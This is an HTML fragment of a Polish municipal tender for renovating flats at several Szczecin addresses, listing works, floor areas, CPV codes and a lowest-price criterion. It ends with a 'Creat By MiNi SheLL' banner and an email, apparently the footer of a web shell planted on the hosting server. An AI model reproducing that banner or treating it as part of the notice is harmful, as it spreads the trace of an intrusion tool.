c)	ul. Strzałowska 38/5 - remont lokalu we wszystkich branżach: budowlanej - malowanie stolarki okiennej i drzwiowej wraz z robotami towarzyszącymi,  malowanie pomieszczeń wraz z robotami towarzyszącymi, montaż czujnika czadu, wymiana wykładziny PCV w kuchni,  remont pieca kaflowego, sanitarnej - próba instalacji gazowej, montaż wodomierza, wymiana kuchenki gazowej 4-palnikowej z piekarnikiem, wymiana zlewozmywaka, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, montaż grzejników konwektorowych,
 powierzchnia lokalu wynosi - 40,70 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> wykonanie remontu czterech komunalnych lokali mieszkalnych przy ul. Dubois 15/2, ul. Emilii Plater 12/1, ul. Radogoskiej 15/9a, ul. Zagłoby 28/4 w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)ul. Dubois 15/2 - remont lokalu (po pożarze) we wszystkich branżach: budowlanej - wymiana stolarki drzwiowej, malowanie stolarki okiennej,  malowanie ścian, sufitów wraz z robotami towarzyszącymi, postawienie pieca licowanego kaflami, montaż czujnika czadu, cyklinowanie podłóg, sanitarnej - wymiana zlewu, montaż wodomierza, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych
powierzchnia lokalu wynosi - 24,56 m2
b)	ul. Emilii Plater 12/1 - remont lokalu we wszystkich branżach: budowlanej - obsadzenie kratki wentylacyjnej, odgrzybienie ścian, przestawienie pieca licowanego kaflami, wymiana wykładziny PCV, montaż nawietrzaka - 3 szt., montaż czujnika czadu, malowanie ścian, sufitów, wraz z robotami towarzyszącymi, sanitarnej - próba instalacji gazowej, wymiana wodomierza, sprawdzenie kuchenki gazowej, wymiana zlewu metalowego, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 27,48 m2  
c)	ul. Radogoska 15/9a - remont lokalu we wszystkich branżach: budowlanej - wymiana wykładziny PCV, montaż czujnika czadu, wyczyszczenie pieca licowanego kaflami, malowanie ścian, sufitów wraz z robotami towarzyszącymi, sanitarnej - wymiana zlewu blaszanego, montaż wodomierza, sprawdzenie kuchenki gazowej z piekarnikiem, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 32,49 m2  
d)ul. Zagłoby 28/4 - remont lokalu we wszystkich branżach: budowlanej - montaż kratki wentylacyjnej, częściowa wymiana tynków, malowanie ścian, sufitów,  wraz z robotami towarzyszącymi, sanitarnej - demontaż urządzeń sanitarnych              z korkowaniem podejść odpływowych, montaż wodomierza, próba instalacji gazowej, elektrycznej - montaż grzejnika elektrycznego, częściowa wymiana osprzętu elektrycznego, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 32,50 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> wykonanie remontu trzech komunalnych lokali mieszkalnych przy ul. Niemierzyńskiej 14/18, ul. Słowackiego 5/10, ul. Zakopiańskiej 14/10 w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	ul. Niemierzyńskiej 14/18 - remont lokalu we wszystkich branżach: budowlanej -   wymiana stolarki okiennej drewnianej na PCV,  malowanie ścian, sufitów, wraz z robotami towarzyszącymi, montaż detektora tlenku węgla, wymiana osprzętu w piecu licowanym kaflami, sanitarnej - montaż wodomierza, wymiana kuchenki gazowej z piekarnikiem, próba instalacji gazowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, montaż grzejnika akumulacyjnego pomiar rezystancji izolacji instalacji elektrycznych,
   powierzchnia lokalu wynosi - 32,89 m2
b)	ul. Słowackiego 5/10 - remont lokalu we wszystkich branżach: budowlanej - wymiana stolarki drzwiowej wewnętrznej i drzwi wejściowych, wymiana stolarki okiennej z PCV, malowanie ścian, sufitów wraz z robotami towarzyszącymi, wymiana tynków, sanitarnej - wymiana umywalki, wymiana zlewozmywaka, wymiana kuchenki gazowej 4 palnikowej z piekarnikiem, próba instalacji gazowej, wykonanie centralnego ogrzewania gazowego etażowego z kotłem gazowym dwufunkcyjnym oraz wydzielenie pomieszczenia na łazienkę z pomieszczenia WC., montaż wanny, montaż ustępu z płuczką ustępową typu (kompakt), elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
                  powierzchnia lokalu wynosi - 35,65 m2 
c)	ul. Zakopiańskiej 14/10 - remont lokalu we wszystkich branżach: budowlanej - obsadzenie kratki wentylacyjnej, wymiana wykładziny PCV w pomieszczeniu kuchni, montaż detektora tlenku węgla, wymiana osprzętu w piecu licowanym kaflami, wymiana stolarki drzwiowej wewnętrznej, malowanie ścian, sufitów wraz z robotami towarzyszącymi, sanitarnej - wymiana zlewu blaszanego, wymiana kuchni gazowej 2 palnikowej bez piekarnika, montaż wodomierza, próba instalacji gazowej, elektrycznej - częściowa wymiana instalacji wraz z  osprzętem, pomiar rezystancji izolacji instalacji elektrycznych, 
  powierzchnia lokalu wynosi - 36,87 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> wykonanie remontu trzech komunalnych lokali mieszkalnych przy ul. Mazurskiej 24/18, ul. Mazurskiej 24/31, ul. Kaszubskiej 33/15 w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> a)	ul. Mazurskiej 24/18 - remont lokalu we wszystkich branżach: budowlanej - przestawieni pieca licowanego kaflami, montaż nawiewników automatycznych w istniejących oknach, montaż detektora tlenku węgla, malowanie ścian, sufitów wraz z robotami towarzyszącymi, osadzenie kratek wentylacyjnych szt.2, sanitarnej - wymiana miski ustępowej, wymiana sedesu z tworzywa sztucznego, wymiana płuczki ustępowej, montaż wodomierza, elektrycznej - częściowa wymiana osprzętu, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 40,90 m2 
b)	ul. Mazurska 24/31 - remont lokalu we wszystkich branżach: budowlanej -    przestawienie pieca licowanego kaflami, malowanie ścian, sufitów, wraz                       z robotami towarzyszącymi, malowanie stolarki okiennej i drzwiowej, obsadzenie kratki wentylacyjnej, montaż detektora tlenku węgla, sanitarnej - próba instalacji gazowej, montaż wodomierza, wymiana kuchenki gazowej dwupalnikowej bez piekarnika, wymiana elementów zestawu płuczki ustępowej, elektrycznej - wymiana instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
powierzchnia lokalu wynosi - 24,41 m2
c)	ul. Kaszubska 33/15 - remont lokalu we wszystkich branżach: budowlanej -malowanie ścian, sufitów, wraz z robotami towarzyszącymi, wymiana stolarki drzwiowej wewnętrznej, sanitarnej - wymiana kuchenki gazowej 4 palnikowej z piekarnikiem, próba instalacji gazowej, montaż wodomierza, elektrycznej - wymian instalacji elektrycznej wraz z osprzętem, pomiar rezystancji izolacji instalacji elektrycznych,
       powierzchnia lokalu wynosi - 38,60 m2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com